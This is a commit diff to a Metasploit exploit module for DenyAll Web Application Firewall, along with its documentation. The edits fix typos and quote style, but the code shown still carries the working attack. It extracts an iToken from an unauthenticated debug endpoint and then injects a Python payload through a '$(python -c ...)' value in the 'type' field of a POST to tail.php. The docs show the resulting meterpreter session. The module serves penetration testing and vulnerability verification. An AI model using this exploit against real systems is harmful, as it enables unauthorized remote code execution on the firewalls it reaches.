Fixing typos and replacing double quotes with single

Author: mdisec

documentation/modules/exploit/linux/http/denyall_waf_exec.md

@@ -1,8 +1,6 @@
 ## Vulnerable Application
 
-This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a terminal command under the context of the web server user.
-
-**Vulnerable Application Installation Steps**
+This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a terminal command under the context of the web server user.
 
 It's possible to have trial demo for 15 days at Amazon Marketplace.
 [https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911](https://aws.amazon.com/marketplace/pp/B01N4Q0INA?qid=1505806897911)
@@ -13,6 +11,18 @@ You just need to follow instruction above URL.
 
 A successful check of the exploit will look like this:
 
+- [ ] Start `msfconsole`
+- [ ] `use use exploit/linux/http/denyall_exec`
+- [ ] Set `RHOST`
+- [ ] Set `LHOST`
+- [ ] Run `check`
+- [ ] **Verify** that you are seeing `The target appears to be vulnerable.`
+- [ ] Run `exploit`
+- [ ] **Verify** that you are seeing `iToken` value extraction.
+- [ ] **Verify** that you are getting `meterpreter` session.
+
+## Scenarios
+
 ```
 msf > use exploit/linux/http/denyall_exec 
 msf exploit(denyall_exec) > 
@@ -34,4 +44,4 @@ msf exploit(denyall_exec) > exploit
 meterpreter > pwd
 /var/log/denyall/reverseproxy
 meterpreter >
-```
+```

modules/exploits/linux/http/denyall_waf_exec.rb

@@ -12,7 +12,7 @@ def initialize(info={})
     super(update_info(info,
       'Name'           => "DenyAll Web Application Firewall Remote Code Execution",
       'Description'    => %q{
-        This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated user can execute a
+        This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a
         terminal command under the context of the web server user.
       },
       'License'        => MSF_LICENSE,
@@ -40,7 +40,7 @@ def initialize(info={})
 
     register_options(
       [
-        OptString.new('TARGETURI', [true, 'The URI of the vulnerable Denyall WAF', '/'])
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/'])
       ]
     )
   end
@@ -51,8 +51,8 @@ def get_token
       'method' => 'GET',
       'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'),
       'vars_get' => {
-        'applianceUid' => "LOCALUID",
-        'typeOf' => "debug"
+        'applianceUid' => 'LOCALUID',
+        'typeOf' => 'debug'
       }
     })
 
@@ -75,7 +75,7 @@ def check
 
   def exploit
     # Get iToken from unauthenticated accessible endpoint
-    print_status("Extracting iToken value")
+    print_status('Extracting iToken value')
     token = get_token
 
     if token.nil?
@@ -85,15 +85,15 @@ def exploit
     end
 
     # Accessing to the vulnerable second endpoint where we have command injection with valid iToken
-    print_status("Trigerring command injection vulnerability with  iToken value.")
+    print_status('Trigerring command injection vulnerability with iToken value.')
     r = rand_text_alpha(5 + rand(3));
 
     send_request_cgi({
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'),
       'vars_post' => {
         'iToken' => token,
-        'tag' => "tunnel",
+        'tag' => 'tunnel',
         'stime' => r,
         'type' => "#{r}$(python -c \"#{payload.encoded}\")"
         }